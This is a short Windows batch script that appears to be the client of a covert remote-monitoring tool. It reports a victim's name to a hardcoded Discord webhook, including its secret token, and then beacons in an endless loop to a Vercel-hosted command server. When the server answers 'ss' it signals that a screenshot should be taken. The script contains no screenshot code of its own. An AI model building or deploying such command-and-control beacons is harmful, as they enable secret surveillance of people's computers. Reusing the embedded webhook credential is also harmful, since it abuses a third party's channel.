@echo off
set "apiRoot=https://screen-view-one.vercel.app"
set /p name=<name.txt
curl -d content="%name%, reporting for dooty" https://discord.com/api/webhooks/1337036102468505610/EeyMS7DjbOVxZvRqiY94PZ8xhBpkmdwD2ad_id3dOzMAuEV5qC0bh-BZJRi_wjSZ5JR3

for /f "delims=" %%i in ('curl -s "%apiRoot%/conf/ping"') do set "waitTime=%%i"
echo Ping interval: %waitTime% seconds

:loop
for /f "delims=" %%i in ('curl -s -X POST -d "name=%name%" "%apiRoot%/u"') do set "result=%%i"
echo Response: %result%

if "%result%"=="ss" (
    curl -d content="%name% needs to nut out ss" https://discord.com/api/webhooks/1337036102468505610/EeyMS7DjbOVxZvRqiY94PZ8xhBpkmdwD2ad_id3dOzMAuEV5qC0bh-BZJRi_wjSZ5JR3
)

timeout /t %waitTime% /nobreak >nul
goto loop
